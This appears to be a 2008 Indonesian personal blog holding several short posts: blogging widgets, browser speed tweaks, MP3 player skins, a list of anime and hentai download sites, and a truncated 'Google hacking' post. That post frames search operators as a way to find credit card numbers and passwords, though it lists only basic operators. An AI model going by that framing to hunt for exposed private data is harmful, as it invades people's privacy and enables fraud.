Sabtu, 19 Juli 2008

jual beli bus

Read More......

bagi yang mau jual / beli bus kami melayani jual beli dalam dan luar kota ( merk&type ) tergantung permintaan anda silahkan kirim ke email saya di donk.depeggy@gmail.com

Senin, 14 Juli 2008

soal buat yang hobby nge hack ( hacker )

Read More......

Nich yang katanya jago hacker, yang sering ngehack website atau mungkin aja ngehack password-password yang ada, nich ada website yang akan menguji nyali anda… apakah anda bisa atau tidak. Perlu anda ketahui disini ada sedikit bantuan yaitu Source Code (Klik kanan website pilih view page source) dan Java Script plus link-link yang misterius, untuk link nya bisa anda lihat dengan cara klik Continue Reading dibagian bawah dan kalo gak salah jika semuanya terjawab anda nanti akan dapat $100 lho nich site nya klik

site download anime

Read More......

Anime: http://www.anime-eden.com http://www.requestanime.com http://www.animedesu.net http://www.animedownloads.us http://www.gamerzplanet.net/ http://www.muffindomain.com/index.php?page=anime.html http://www.mrpc.us/fansub.htm http://www.cybertokyo.net http://www.Animestash.tk http://www.anime-plaza.nl http://realitylapse.com/ http://db.illegalt.net/ http://www.AnimeChronos.net http://finalx.nl/db/ http://www.lekshoo.com/anime.php http://www.snapplex.org/ http://db.teknews.net/ http://www.anime-plaza.nl http://www.anime-alliance.com/index.php http://www.animeupload.com/downloads/ Hentai: http://browsehentai.com http://www.aerisdies.com http://www.anime-plaza.nl http://hentaieden.blogspot.com/ Manga: http://www.stoptazmo.com http://www.vnmanga.com Untuk sementara hanya ini yang saya ketahui

Minggu, 13 Juli 2008

mengakses blog lewat hp

Read More......

Pengin blog kamu bisa diakses ke dalam handphone, pda atau gadget apapun yang berbau mobile??? hmmm… kayaknya kamu perlu mencoba situs keren berikut. Yup, di situs http://www.wirenode.com dan http://www.mofuse.com menawarkan cara mudah agar blog kamu bisa diakses secara mobile menggunakan handphone/ponsel. Caranya cukup simple. Kamu tinggal register di salahsatu situs tersebut kemudian masukkan RSS feed blog kamu yang akan digunakan sebagai content blog mobile. Enaknya lagi, tampilan blog kamu versi mobile tersebut bisa dimodifikasi juga (disediakan templatenya). Selain itu kamu bebas memilih alamat URL yang dikehendaki untuk blog versi mobile milikmu. Bahkan pada Mofuse.com selain sebagai penyedia situs converter blog to mobile, di situs tersebut juga tersedia layanan pengiklanan yang memungkinkan kamu untuk mendapatkan uang jajan hehehehe…

Sabtu, 12 Juli 2008

free widget (58)

Read More......

Widget jika berhubungan dengan web ataupun blog maka yang dimaksud adalah sebuah tool (alat yang berguna) dalam memaksimalkan keindahan, kecantikan, serta “kenarsisan” blog Anda. *heuheu* Widget sendiri merupakan sebuah elemen yang berguna dan mudah digunakan baik yang telah disediakan oleh penyedia layanan blog yang Anda gunakan maupun berasal dari third party atau pihak ketiga. Penggunaan serta pemasangan widget telah sangat dimudahkan oleh pihak-pihak penyedia layanan, sehingga yang Anda perlukan *biasanya* hanya mendaftar atau bahkan ada yang tidak perlu mendaftar sama sekali, cukup mengcopy scrift yang telah disediakan dalam element blog Anda. Nah berikut ini 58 widget pilihan untuk mempercantik tampilan blog Anda. Note: Saya sarankan jangan terlalu berlebihan memasang widget karena selain agama juga melarang *kesannya* memasang widget yang berlebih-lebihan *terlalu banyak* bisa mengakibatkan blog jadi terkesan kumuh dan membebani loading halaman blog Anda sehingga tidak menutup kemungkinan terjadi PLP. 1. MyBlogLog’s Recent Readers - Widget satu ini sejak kehadirannya didunia lain blog langsung mendapat sambutan meriah layaknya seleb baru yg lagi naek daun. Widget ini memperlihatkan avatar dari para pengunjung blog Anda. Dan dengan kepopuleran widget satu ini sampai-sampai manajemen MyBloglog mampu meyakinkan Yahooo (baca: yahuu) untuk membeli sahamnya. *Mantab sangad* So, yang Anda perlukan untuk mendapat widget ini adalah mempunyai account yahuu. 2. Mashable - Widget ini menyediakan semacam newsreel (headline news) dalam element blogger yang memberikan cuplikan berita/postingan dari sosial networking. Bedanya ada pilihan warna untuk disesuaikan dengan layout blog Anda. 3. Headline NewsHeadline News - Seperti widget mashable, widget ini pun menampilkan cuplikan headline berita dari situs-situs di seluruh penjuru dunia. 4. Flickr Flash Photo Stream Badge - Widget ini menampilkan photo-photo dari profil flickr Anda secara berurutan dan dengan sentuhan flash. Flickr merupakan bagian dari yahoo jadi untuk mendapatkan widget ini Anda memerlukan account yahoo seperti pada widget MyBlogLog di atas. 5. Preview Anywhere - sudah cukup terkenal juga nama snapshots bagi pengguna blogger bahkan untuk wordpress widget ini menjadi rekomendasi khusus dalam dashbord admin penggunanya. Fungsinya untuk melihat preview link keluar dengan tampilan popup yang tidak terlalu besar ketika pengunjung mengarahkan mouse pada teks atau banner yang “mengandung” link. Pro-kontra memang selalu ada; sebagian menganggap widget ini berguna karena menandakan kejujuran kita selaku pemilik blog, namun ada juga yang mencap kambing hitam sebagai biang lojalabo. *heuheu* 6. Twitter Badge - Jika dalam keseharian hidup Anda banyak hal-hal menarik dan begitu penuh warna dengan segudang aktifitas serta ingin agar orang lain tahu dan menampilkan cuplikan kalimat-kalimat pendek *satu paragraf misalnya* Anda sedang melakukan kegiatan ini, Anda sedang berada dimana, Anda sedang bersama siapa, Anda sedang, sedang, dan sedang lainnya…. Maka widget ini cocok untuk dipasang pada blog Anda. Daripada bikin sendiri element blogger/wordpress *secara manual* menuliskan teks sebagai pesan kepada pengunjung blog Anda bahwa Anda sedang ini-itu, saya sarankan lebih baik menggunakan widget ini. Widget ini akan menampilkan “tweet” terbaru Anda. 7. Digg News - Widget ini manampilkan Link terakhir yang masuk ke Digg sebuah social bookmarking yang sudah “kakoncara” dijagat perbloggan mah lah… *halaaah* Pilihan theme dan warna mudah untuk Anda atur agar sesuai dengan template blog Anda. 8. FEEDJIT - Widget ini paling wuenak diantara widget lainnya, misalkan kalo kita lagi cape, lesu, sendi-sendi lagi nggak enak, otot kaku, badan pegal, masuk angin… maka suruh aja si mbok untuk feedjit *oooh itu pijit ya* heuheu. Feedjit merupakan layanan real time traffic pada blog Anda. Ada empat pilihan widget Feedjit yang bisa Anda gunakan, silahkan kunjungi saja Feedjit dan lihat empat widget apa saja yang tersedia. 9. LineBuzz - Komentar dalam widget inline untuk Blog Anda. Widget ini sangat berguna bagi blog yang memiliki frekuensi di atas 900 Mhz tinggi dalam menerima komentar, sehingga memudahkan berkomentar jika terjadi diskusi yang berkepanjangan *waaah keren euy*. Hanya sayang, pengunjung harus terdaftar LineBuzz dulu untuk berkomentar *bikin berabe juga* 10. Flixn - Jika kompi atau laptop Anda terpasang webcam, maka widget ini bisa digunakan untuk memperlihatkan ekspresi “narsis” Anda langsung melalui blog Anda *heuheu* . Jadi pengunjung blog tidak hanya membaca postingan Anda tapi bisa menyaksikan “konser” Anda didepan monitor, mirip webcam yahoo. 11. 3Jam - Widget ini memudahkan pengunjung blog untuk berinteraksi dengan Anda dengan mengirimkan SMS pada henpun Anda tanpa mereka tahu nomor HP Anda. 12. Jaxtr - Seperti halnya widget 3jam di atas, dengan menggunakan widget Jaxtr ini, pengunjung blog bisa menghubungi HP Anda tanpa mereka tahu nomor HP Anda. *nomor HP Anda dijamin kerahasiaannya* 13. LinkedInABox - Menampilkan profile Anda di LinkedIn. Dan widget ini sangat cocok untuk blog personal. 14. Box Widget - Dengan widget ini, memudahkan pengunjung blog Anda untuk mengupload file ke tempat penyimpanan online box.net melalui widget box.net pada blog Anda. 15. Price of gas - Menampilkan harga bahan bakar kendaraan bermotor secara online (US$), kalo di Indonesia mungkin seperti harga Bensin premium, pertamax dan solar. “sangat cocok” untuk pengunjung blog Anda yang mobilitasnya tinggi. *terasa aneh* tapi kalo blog Anda memang membahas masalah gas bumi, bahan bakar dan yang sejenis maka widget ini sangat cocok, lagian tidak perlu mendaftar hanya mengcopas scrift yang disediakan Gas-Cost.Net. 16. iBegin Weather Widget - Menampilkan laporan cuaca untuk wilayah Kanada dan Amerika. Seperti widget Price of Gas di atas widget ini hanya cocok untuk blog yang memang membahas masalah yang sama. 17. ClockLink - Sepertinya widget ini yang paling banyak diminati dan digunakan para blogger yang peduli dengan manajemen waktu *ekhm* seperti namanya clock, widget ini menampilkan petunjuk waktu atau jam pada blog Anda. 18. Film Loops - Menampilkan kesimpulan filem terakhir yang Anda tonton melalui account FilmLoops Anda. 19. Daily Painters - Widget ini sangat cocok bagi Anda yang berjiwa seni tinggi karena widget ini menampilkan lukisan-lukisan dari pelukis terkenal di dunia. 20. WhoLinked - Memperlihatkan kepada pengunjung blog Anda situs-situs yang telah melink pada blog Anda. tidak perlu mengupdate karena WhoLinked ini secara teratur mengupdate sendiri web/blog yang melink blog Anda. 21. Criteo AutoRoll - Widget ini memperlihatkan link menuju blog-blog yang sehaluan dengan blog Anda. Sehaluan…? Secara…! Heuheu. 22. Calender - Berbeda dengan wordpress yang sudah mempunyai widget ini di dalamnya, untuk pengguna blogger widget kalender belum tersedia, oleh karenanya jika Anda ingin menampilkan kalender maka widget satu ini pantas di perhitungkan. 23. Bitty Browser - Menampilkan web browser “mini” pada sidebar blog Anda. Tapi mesti hati-hati sama yang namanya “mini” ada rok mini, metro mini, dan mini-mini yang lainnya… *beuh ga nyambung* 24. Leafletter - Ini juga sama masih masalah mini, widget ini membuat website mini dan menyimpannya pada blog Anda. 25. WikiSeek - Menampilkan widget untuk pencarian pada Wikipedia. 26. FeedCount - Menampilkan jumlah pengunjung blog Anda melalui banner kecil dan widget ini berhubungan dengan account feedburner Anda. 27. Technorati Link Count - Menampilkan reaksi jumlah link yang menuju blog Anda dari salah satu directory blog terbesar dan terpopuler abad ini… dialaaaaaaah Technoraaaaati. *juara tinju dunia kita* halaaaah. 28. MyPageRank - Inilah cara lain untuk sombong menunjukkan betapa hebat dan bermanfaatnya blog Anda dengan menampilkan Ranking Google atau Google PageRank (PR). Penilaian PR google ini seperti saat kita SD dulu ada rangking 1 sampe 10, bedanya PR yang baik menurut google itu yang lebih besar alias 10, kalo baru satu berarti belum besar-besar amat blog Anda. 29. CheckPageRank - Pilihan lain untuk menampilkan PR blog Anda, namun kelebihannya widget ini menampilkan juga ranking Alexa. 30. Counter Statistic - Bagi Anda yang ingin melihat jumlah pengunjung Anda sehari-hari, maka widget ini adalah salah satu yang menyediakan fasilitas tersebut. 31. Web/Blog Counter - Widget ini datangnya dari Histats.Com yang memungkinkan Anda bisa melacak pengunjung datang dari mana saja, lewat pintu mana saja, dan menghitung jumlah pengunjung blog Anda sehari-hari berapa, referer dari blog mana saja, dan jika melalui search engine semisal google, yahoo, msn menggunakan keyword apa. Jika Anda ingin melihat IP Address pengunjung blog Anda, widget histats ini yang bisa saya rekomendasikan. 32. BlinkxIt - Widget mantab sangad karena menampilkan banner kecil dibawah setiap postingan blog Anda, ketika banner BlikxIt itu di klik maka keluar mini popup seperti snapshot dan menampilkan video yang berhubungan dengan postingan blog Anda. 33. Skype button - Seperti widget menampilkan status online YM pada blog Anda, widget ini pun hampir sama cuma bedanya status online/offline pada account skype Anda yang ditampilkan. 34. RockYou Horoscope - Saya tidak menganjurkan widget ini pada blogger muslim, soalnya ini berupa ramalan yang sudah jelas-jelas dilarang oleh agama kita sodara-sodara! Konsekuensinya jika Anda percaya ramalan maka 40 hari shalat Anda tidak diterima *mode galak* Heuheu… 35. Bravenet Horoscope - Seperti halnya widget di atas, bravenet pun menyediakan widget horoscope untuk blog Anda. 36. del.icio.us Tagometer - Widget ini menampilkan berapa banyak pengguna del.icio.us membookmark blog Anda. 37. del.icio.us Linkrolls - Widget ini menampilkan bookmark terakhir Anda dari del.icio.us. 38. Timelines - Perlu membuat timeline untuk blog Anda? Maka widget cukup mudah digunakan, hanya perlu memasukan RSS blog Anda lalu memasukkan ukuran lebar dan tingginya. 39. PollDaddy - PollDaddy memberikan Anda kemudahan membuat sebuah poling atau survey interaktif padamu negeri dengan theme yang sangat cantik dan menawan hati tanpa batas waktu yang harus memisahkan antara kita berdua, biar langit dan bumi yang menjadi saksi cinta suci nan tulus kita berdua. 40. Vizu - Pilihan widget lain untuk membuat poling pada blog Anda, kelebihannya widget ini cocok dengan platform blog manapun. 41. AnswerTips - Memperlihatkan jawaban dari Answers.com untuk berbagai macam istilah yang terdapat pada blog Anda *berguna jika pengunjung blog Anda adalah mas tukul*. pis mas… Heuheu. 42. AnswerBoxes - Masih widget dari Answer.Com hanya saja widget ini memberikan kesempatan pada pengunjung blog Anda untuk memasukan istilah yang tidak dimengerti dan mendapat jawaban segala risau hatiku dari Answer.Com. 43. Now Playing - Jika Anda ingin sharing playlist musik yang sedang Anda dengarkan dan ingin agar pengunjung blog Anda juga mendengarkan, nah Signamp menawarkan widget ini, biar signamp yang melakukan trik bagaimana hal itu mungin terjadi. 44. BuzzBoost - Menampilkan headline dari RSS FeedBurner blog Anda pada blog Anda sendiri ataupun blog Anda yang lain atau juga pada blog teman Anda atau mungkin blognya sodara Anda atau juga pada blognya dia, mereka dan dirinya. *jangan maksa deh* 45. LibraryThing - Tampilkan buku terakhir yang telah Anda baca wahai kutu buku! 46. Plaxo Address Book - Izinkan pengunjung setia yang telah Anda percayai untuk mengakses buku tamu mereka langsung dari blog Anda. 47. AuctionAds - Widget yang menampilkan pelelangan barang dari eBay, dan memberikan kesempatan pada untuk mendapat persentase *uang denger gitu loh* dengan catatan pengunjung blog Anda membeli barang lelang tersebut. 48. aStore - Hampir mirip dengan AuctionAds di atas, hanya saja widget ini datangnya dari Amazon. Widget ini memungkinkan Anda menampilkan “warung sederhana” tapi jika ada yang beli lewat warung Anda tersebut Anda mendapatkan keuntungan dari Amazon. Btw, sudah daftar amazon belum? Kalo belum Klik Disini untuk daftar dan langsung buat “warung sederhananya”. Heuheu. 49. Deal of The Day - Masih dari Amazon ini merupakan widget paling anyar yang dirilis amazon. Yang menarik dari widget ini adalah diskon besar-besaran yang ditawarkan untuk pengunjung blog Anda. Dan jika ada yang membeli barang dari widget tersebut tentu Anda mendapat persenan dari amazon, lumayanlah buat beli kacang goreng. Heuheu. 50. Plazes - Widget ini menampilkan dimana posisi Anda, apakah sudah PW atau belum…? Kalo belum PW cari dulu deh tempat yg nyaman buat ngeblog biar PW . Nah widget ini menampilkan lokasi peta dimana kamu berada. *nyambungkah?* 51. Stockalicious - Perlihatkan portfolio Anda dengan widget ini, dan sharing dengan blogger lain. Biar semua orang tahu berapa banyak dana yang telah Anda keluarkan untuk ngeblog. *mudah2an ada yg mau nyumbang* heuheu. 52. Yahoo! For Good - Widget ini untuk membuat “kotak amal” dan akan didonasikan kepada yang berhak menerimanya. *kata Yahoo* Jadi bagi Anda yang berjiwa sosial, rasanya widget ini perlu, anggap saja blog Anda warung atau toko yang menerima penitipan kotak amal. ^_^ 53. Giftspace - Sahabat ataupun teman blogger akan memberi hadiah di hari Ultah Anda tapi mereka tidak tahu harus membeli hadiah apa yang sekiranya Anda inginkan. Nah melalui widget ini biarkan mereka tahu kado apa yang sebenarnya Anda inginkan. *meski diberi nawar boleh donks* heuheu. 54. MixMap - Dari widget ini Anda bisa melihat pengunjung profile MySpace Anda dari sebuah Peta. 55. Google Map Widget - Perlihatkan pencarian pada peta google dari blog Anda. 56. Google Video Search - Tampilkan form pencarian video dari video pilihan pada blog Anda. 57. This Day in History - Widget ini menampilkan cuplikan bahwa hari ini ada sejarah apa pada masa lalu. 58. Shoutbox - Fungsi shoutbox adalah untuk menampung pesan singkat teman atau para blogger yang tengah blogwalking. Untuk shoutbox banyak pilihan yang bisa Anda gunakan diantaranya, Shoutmix, Cbox, atau kalo Anda berorientasi nasionalis dan cinta produk dalam negeri Anda bisa memilih Oggix Kalo mau menambahkan widget lain yang Anda temukan silahkan tambahkan pada kolom komentar atau bisa dikirim ke email saya dan semoga posting ini bermanfaat untuk para blogger mania. Terimakasih powered by donkdepeggy

Selasa, 08 Juli 2008

google spy ..................der

Read More......

Rahasia blog kali ini yaitu mengenai google spider. JIka anda ingin mengetahui bagaimana Google menggerayangi sebuah situs? Apa-apa saja yang dilihat oleh si spider view engines yang menjaring halaman web?? Buka situs ini dan masukkan alamat website atau blog anda, kemudian lihat apa yang dilihat oleh spider :)

blog widget lagi nich........

Read More......

Blog widget merupakan sesuatu yang membantu blogger untuk mengembangkan blognya. Dengan kata lain saya tidak tau pengertian blog widget secara teoritis. \Kemungkinan penjelasan berikut tidak begitu benar, namun tidak ada salahnya untuk menulis sesuai keinginan hati. kan juga namanya blog .... Setelah anda memutuskan untuk membuat sebuah blog, anda mungkin berpikir 'bagaimana supaya blog ini dikenal orang ya??' (itu sih cuma kemungkinan.. bisa ia bisa enggak juga) Tapi kalau anda berpikir begitu, artinya kita sama dunk. Cuma bedanya anda lebih pintar karena saya berpikir seperti itu jauh setelah saya pertama kali ngeblog ;) Hal yang tidak kalah penting dalam ngeblog adalah 'bagaimana menghiasi blog anda'. Perhiasan blog yang artinya blog widget dalam memory donkdepeggy. Dengan widget blog akan menjadi lebih atraktif dan tentu lebih menarik. Sama seperti kita juga yang tentunya suka melihat orang yang rapi dan mungkin banyak yang suka dengan perhiasan dunia ini. Kalau saya sih engga begitu suka perhiasan.. Bukan karena ga ada perhiasan, tapi karena emang ga sanggup buat beli begituan. Mending perhiasan buat dunia akhir nanti, jadi ga bisa stolen alias di klepto (dicolong) orang.. Semoga nanti di dunia akhir perhiasan abadi udah menunggu kita semua. Amin.. walahh.. kok jadi gini ceritanya ya?? Lanjut... Ada baiknya menggunakan: 1. Feedburner Sebagai alat yang membantu anda menyampaikan apa yang anda sampaikan di blog langsung ke email pelanggan anda. Sehingga dapat dibaca dari inbox mereka. Jika ingin melihatnya, di blog ini juga ada kok. Kalau ngga percaya masukkan aja alamat email anda ke kotak yang ada di sidebar blog ini.) 2. IntenseDebate Plug in yang membantu blog anda agar menampilkan kolom komentar seperti yang ada pada wordpress sehingga pengunjung tidak perlu lagi mengklik 'post a comment' untuk meninggalkan pesan. Sengaja ngga diterapkan di blog ini dengan alasan tampilan komentar standar yang ada lebih keren dan lebih enak dibaca ;) alahh.. Alasan aja padahal emang malas login ke intense debate 3. Imagecow Imagescows, imagecows, yah kira-kira seperti itulah namanya. Situs tempat menyimpan gambar gratis buatan anak negri ini emang membantu banget. Udah gratis, nggak perlu daftar atau tetek bengek segala macam. Tinggal upload dan selesai. Mungkin untungnya dari iklan adsense yang ada disitu. Setau saya pemiliknya ya cosa si pecinta sapi yang sukses didunia maya ini;) (he he he peace bro..) Notes: Karena begitu banyak banyak site yang menggunakan layanan gratis atau tempat penyimpanan gambar yang gratisan dan bahkan kurang jelas keberadaannya, anda juga dapat menggunakan blogger sebagai penggantinya. Namun disini anda tidak bisa mengatur gambar yang sudah anda upload nantinya. Imagecowsjuga sepertinya sedang mengahadapi masalah dengan servernya. Mungkin anda tertarik dengan imageshack 4. Daftar di sitemeter tidak lebih dari 5 menit dengan kegunaan yang sangat membantu sekali dalam memonitoring blog anda nantinya. Dengan menggunakan sitemeter statistik anda akan mengetahui jumlah visitor, lokasi pengunjung, referral page, out click pages, dan berbagai statistik lainnya. 5. Blogexplosion Cara yang sangat mudah untuk mendatangkan trafik pengunjung ke blog anda. Konsepnya sangat sederhana, yaitu: setiap anda mengunjungi blog orang lain, maka mereka juga akan mengunjungi blog anda. Dan setiap 2 blog yang anda kunjungi, 1 visitor akan mengunjungi anda. Ini sangat membantu untuk memperkenalkan blog anda. 6. Creative Commons Nah ini untuk melindungi hak cipta anda supaya terlindungi. Creative commons menawarkan a flexible range of protections and freedoms bagi si pemilik dan artis. Anda akan mendapatkan 'all rights reserved' 'some rights reserved' sebagai copyright. Anda tidak perlu membayar untuk menggunakan layanan ini, dan tentu saja anda bebas menggunakan karya orisinil sesuka anda karena anda juga dilindungi oleh hukum. 7. Kumpul blogger Nah layanan ini cocok untuk blog yang berbahasa indonesia, karena anda dapat mengumpulkan uang dari iklan yang ditampilkan di blog anda nantinya. Namun jika anda menggunakan blog dalam bahasa bule alias english ada baiknya for menggunakan Google adsense .ok demikian posting ini saya bikin dan selanjutnya saya akan tulis lebih banyak lagi... pada kesempatan yang lain.... jadi jangan lupa berkunjung kembali ke blog ini........ thank's

Minggu, 06 Juli 2008

tips mempercepat akses internet

Read More......

Saat anda browsing atau membuka suatu website di internet entah dari warung internet ataupun dari rumah, mungkin anda sering mengeluh akan lambatnya akses untuk menampilkan website tersebut. Padahal akses internet di Indonesia sekarang ini masih terhitung mahal. Sebenarnya ada cara-cara mudah untuk meningkatkan kecepatan akses internat anda tanpa harus membayar biaya lebih mahal. Beberapa diantaranya adalah dengan menyetting browser kita, menggunakan openDNS, dan menggunakan Google Web Accelerator. Untuk menerapkan trik-trik tersebut sangat mudah. Cara pertama yaitu menyetting browser dapat dilakukan oleh pengguna Internet Explorer dan Mozilla Firefox. Bagi pengguna Internet Explorer klik menu [Tools] [Internet Option], klik tab [General]. Pada opsi “Temperory Internet files”, klik [Settings] lalu Geser slider-nya. Hal itu untuk membuat cache (lokasi penyimpanan sementara) untuk web yang anda buka, sebaliknya disediakan sekitar 5% dari Hard disk. Bagi pengguna Mozilla Firefox anda dapat mengetikkan “about:config” pada address bar,. setelah itu ubah “network.http.pipelining” dan “network.http.proxy pipelining” menjadi “true”, serta isi “network.http.pipelining.maxrequests” antara 30 –100 ( semakin besar semakin cepat ). Yang terakhir klik kanan dimana saja dan pilih New->Integer , tuliskan “nglayout.initialpaint.delay” lalu isi dengan 0. Untuk trik kedua, pertama anda harus mendaftar di www.openDNS.com . Setelah itu masuk ke Control Panel dari start menu, pilih network connections lalu pilih koneksi anda dan klik tombol properties. Pada bagian Internet protokol anda bisa pilih TCP/IP dan klik properties. Masukkan angka 208.67.222.222 dan 208.67.220.220 pada opsi DNS dan restart komputer anda. Setelah melakukan 2 tips di atas sekarang anda pasti akan mendapat kecepatan akses yang lebih kencang. Bagi yang masih belum puas dengan kecepatan aksesnya sekarang dapat menggunakan trik yang ke tiga yaitu Google Web Accelerator. Google Web Accelerator di desain khusus untuk mempercepat akses internet anda, khususnya anda yang menggunakan koneksi broadband (pita lebar) seperti Cable dan DSL. Untuk anda yang menggunakan koneksi lain seperti Dial-up (Telkomnet Instant atau Speedy) maupun satelit atau wave, Google Web Accelerator juga dapat mempercepat aksesnya. Untuk memakai Google Web Accelerator anda harus memenuhi kriteria antara lain Operating System anda harus Windows XP atau Windows 2000 dan browser anda harus Internet Explorer 5.5+ atau Mozilla Firefox 3.0+. Kalau untuk browser lainnya sebenarnya juga bisa, tetapi anda harus meng-konfigurasi proxy settings dari browser anda dengan menambah 127.0.0.1:9100 pada HTTP. Setelah anda melakukan instalasi, Google Web Accelerator akan menampilkan icon kecil di atas browser anda dan icon tray di pojok bawah layar komputer. Anda dapat mengunduh Google Web Accelerator di http://webaccelerator.google.com . Powered by donkdepeggy

10 trips & trik blogger

Read More......

1. Jadilah Diri Anda Sendiri Anda harus yakin pada tujuan anda ngeblog. Jangan terbebani oleh apa yang harus anda tulis. Fokuskan penulisan pada hal yang menarik perhatian dan perasaan Anda. 2. Selalu Semangat Semangat anda ngeblog dapat menulari para blogger lain. Maka bersemangatlah. 3. Selalu Update Blog Anda Usahakan untuk meng-update blog anda, minimal 1 kali sehari. Keuntungannya adalah, pembaca akan senang karena blog anda selalu up to date, mereka mendapat informasi baru, dan search engine akan berulang-ulang melacak keberadaan blog Anda sehingga akan menjadi lebih mudah dikenali. 4. Link Blogroll Cantumkan banyak link di blog anda, hingga andapun akan di link oleh mereka. Pihak ketiga menemukan Anda lewat link tersebut. 5. Rajinlah Komen Komenlah ke blogger lain dengan etika dan sopan santun yang baik, hingga blogger lain akan mengenal dan mengerti minat yang sama dengan anda. Dari menuliskan komen, mereka akan datang ke blog anda dan membaca informasi mencari minat yang sama. 6. Bersenang-SenangLah Buat kegiatan blogging menyenangkan. temukan hal baru yang menarik dari kegiatan blogging ini. Jangan kelewat formal, bersikaplah santai tetapi serius. 7. Dorong Sampai Melewati batas Eksploitasi blog anda dengan teknologi baru misal musik, video, podcasting atau carilah eksperimen atau inovasi baru yang bisa akan menciptakan trend yang unik. 8. Ping Aktifkan fasilitas Ping (Blogger / Wordpress punya fasilitas ini) yang memungkinkan perangkat lunak seperti Blogger memberitahu ke beberapa layanan tertentu bahwa Anda sedang membuat blog baru. 9. Gunakan Feed-Feed Feeds (yang lebih formal disebut dengan istilah RSS / format pertukaran konten pada sebuah web.) merupakan suatu metode yang memungkinkan orang lain mengetahui blog-blog terbaru secara cepat. Untuk mendapatkan feed ini, kita membutuhkan perangkat tertentu.seperti FeedBurner. 10. Buat Judul yang Menarik Judul yang menarik tidak saja memikat orang lain untuk datang dan membaca. Search Engine juga tertarik dengan judul yang menarik karena biasanya, orang-orang menulis kata kunci yang cenderung sama untuk sebuah content. Jadi usahakan untuk menulis judul semenarik mungkin.

bikin skin mp3

Read More......

Berhubungan dengan aplikasi, Ultra MP3 merupakan aplikasi yang sangat laris di pasaran, dengan tampilan yang sangat elegan dan simple, serta mudah dipahami bagi para pemula. Maka tak heran jika aplikasi pemutar musik ini sangat banyak diminati oleh pemakai ponsel multimedia. Aplikasi ini dapat di download secara gratis di internet bersama dengan skinnya, selain itu aplikasi ini sangat gampang diperoleh di kios-kios phone atau selular terdekat yang menyediakan layanan download aplikasi dengan harga yang relative murah. Cara membuat skin Ultra MP3 secara manual, sebagai berikut: # Pada saat kita menginstal aplikasi Ultra MP3 di ponsel skin yang kita peroleh hanya 3 atau 4, itu merupakan skin standar yang disediakan. Menyiasati hal tersebut agar tampilan aplikasi tersebut tidak monoton alias itu mulu, ada baiknya kita berkreatifitas dengan membuat skin sendiri sesuai gambar yang kita suka; # Pada saat penginstalan Ultra MP3 kita memperoleh skin standar, lalu copy salah satu skin tersebut ke folder latihan anda; # Pastkan komputer anda sudah terinstal program Winzip atau Winrar, # Ubah ekstensi file tersebut dari “.mp3skin” ke “.zip”; # Extract file tersebut dan anda akan memperoleh beberapa file; # Buka file "skin.pcx" lewat Adobe photoshop atau program image lainnya yang support; # Pilih gambar yang akan dibuat skin lalu sesuaikan dengan ukuran file "skin.pcx" tersebut; # Simpan file image yang baru dibuat dengan nama "skin.pcx" (jika terletak pada folder yang sama maka file sebelumnya akan tertimpa); # Pastikan file "skin.pcx" yang lama telah terganti dengan yang baru, # Add to zip file tersebut bersama file yang di extract sebelumnya (blok file yang akan di add klik kanan pilih add to zip); # Rename file tersebut sesuai keinginan anda dengan ekstensi “.mp3skin”

Read More......

weeww... logo google berubah hari ini............. buat kamu yng pngen nama kamu dibikin kayak google klik aja di http://googlefont.com kmu bisa berkreasi sesuka kamu dan yang penting.... kunjungi kembali blog saya at http://donkdepeggy.blogspot.com thanks

google hacking's nichhh

Read More......

Google merupakan satu dari beberapa perusahaan sangat besar didalam bidang bisnis internet. Selain menjadi satu dari beberapa perusahaan terbesar di dunia internet ini, google juga ternyata menjadi satu dari beberapa website yang dapat dikatakan memiliki jumlah catatan pengunjung terbanyak, bagaimana tidak? Segala sesuatu yang sehubungan dengan internet sekarang ini semuannya dapat dicari melalui google, dari data mengenai masalah umum, berita, hingga informasi teknis. Berbicara sehubungan dengan sub judul artikel ini, yang berbunyi “Taking Advantage of Technology”, dalam artikel kali ini saya akan sedikit membahas mengenai sebuah tehnik hacking yang menggunakan layanan yang diberikan daripada google ini sendiri. Seperti yang telah kita ketahui, bahwa dengan adanya kemajuan teknologi dan semakin berkembangnya industri internet, tentu juga banyak hal hal lain yang terjadi sehubungan dengan system keamanan. Majunya sebuah jenis teknologi, tentu akan diimbangi dengan tehnik “men-dobrak” daripada system itu sendiri. Ini dapat kita lihat dalam kasus google.com sebab telah diketahui bahwa selain berguna sebagai sebuah search engine paling ampuh dengan database yang mencapai miliaran jumlahnya, google pun tidak dapat menutupi kenyataan bahwa banyak hacker yang menggunakan google.com sebagai sarana melakukan tindak “iseng-iseng” di internet, sebab selain dapat mencari data data seperti MP3, Film, Artikel, dan lain sebagainyam google pun memiliki kemampuan untuk dapat mencari data yang dapat digolongkan sebagai data rahasia. Dengan menggunakan sedikit kemampuan unik, dan tentunya dengan menggunakan google.com sebagai sarana pencarian data, ternyata orang dapat menemukan banyak data sensitive di Internet. Data data yang dimaksud dengan data sensitive adalah data yang dapat digolongkan sebagai data pribadi, seperti nomor kartu kredit, dan password. Menggunakan google tentunya sudah bukanlah merupakan sebuah hal yang aneh lagi bagi mereka yang sering menggunakan internet. Ditambah lagi, mengingat penggunaan daripada website google.com itu sendiri yang sangat user-friendly, penulis merasa tidak perlu untuk menjelaskan lebih lanjut mengenai metode mencari dengan menggunakan google. Dalam artikel ini kita akan membahas lebih kearah dasar metode pencarian serta pengenalan string dalam penggunaannya di google.com serta contoh contoh bentuk kalimat pencarian yang sangat membantu dalam melakukan google hacking nantinya. Tehnik Dasar Pencarian * Penggunaan string (+) digunakan untuk melakukan pencarian paksa terhadap huruf yang serupa. Sedangkan (-) digunakan untuk men-tidak sertakan sebuah kata dalam pencarian. * Untuk mencari sebuah susunan kata tertentu dengan sangat tepat, maka anda perlu menggunakan string (“ “) * Sedangkan titik (.) digunakan untuk melakukan metode pencarian text satu karakter. * Tanda bintang melambangkan segala huruf. * Syntax site: digunakan untuk memerintahkan google supaya melakukan pencarian dalam situs tertentu saja. Alamat situsnya dapat dimasukan sesudah tanda titik dua. (e.g site:www.th0r.name) * Syntax filetype: digunakan untuk memerintahkan google untuk melakukan pencarian terhadap jenis file secara ter-spesifikasi. Jenis file yang ingin dicari dapat diposisikan setelah tanda titik dua. * Syntax link: digunakan untuk memerintahkan google supaya hanya melakukan pencarian dalam hyperlinks tertentu. * Syntax cache: digunakan untuk memerintahkan google untuk menampilkan versi daripada sebuah webpage pada saat google membukanya. Keterangan mengenai alamat website dapat ditambahkan pada bagian akhir sesudah tanda titik dua. * Syntax intitle: dalam hal ini google diperintahkan hanya untuk mencari keterangan berdasarkan title daripada dokumen dokumen tertentu, sesuai dengan yang kita ketikan pada 